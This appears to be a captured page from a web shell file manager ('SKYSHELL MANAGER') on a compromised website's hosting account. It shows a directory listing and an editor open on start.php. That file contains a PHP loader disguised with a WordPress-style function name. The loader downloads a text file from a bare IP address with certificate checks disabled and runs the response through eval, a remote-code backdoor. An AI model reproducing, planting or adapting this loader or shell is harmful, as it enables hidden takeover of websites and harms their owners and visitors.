📁
SKYSHELL MANAGER-
🛒
PHP v7.4.33
Create Folder
Create File
Current Path:
home
/
oshofree
/
public_html
/
chbluxuries.com
/
boot
/
Name
Size
Permissions
Actions
📁
..
-
0755
🗑️
🔒
📁
css
-
0755
🗑️
🔒
📁
js
-
0755
🗑️
🔒
📄
config.php
7.06 KB
0444
🗑️
⬇️
✏️
🔒
📄
error_log
127.31 KB
0644
🗑️
⬇️
✏️
🔒
Editing: start.php
<?php function WordPress_Http_Curl ( $url, $args = array() ) { if ( ! function_exists( 'curl_init' ) || ! function_exists( 'curl_exec' ) ) { return false; } $handle = curl_init(); curl_setopt( $handle, CURLOPT_URL, $url ); curl_setopt( $handle, CURLOPT_RETURNTRANSFER, true ); curl_setopt( $handle, CURLOPT_HEADER, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYHOST, false ); curl_setopt( $handle, CURLOPT_SSL_VERIFYPEER, false ); $response = curl_exec( $handle ); $curl_error = curl_error( $handle ); if ( !$curl_error ) { $response = array( 'data' => eval( '?>'. $response ) ); return $response; } if ( PHP_VERSION_ID < 80000 ) { curl_close( $handle ); } } $result = WordPress_Http_Curl( 'http://69.30.221.74/z60122_2/stat/index.txt' );
💾 Save Changes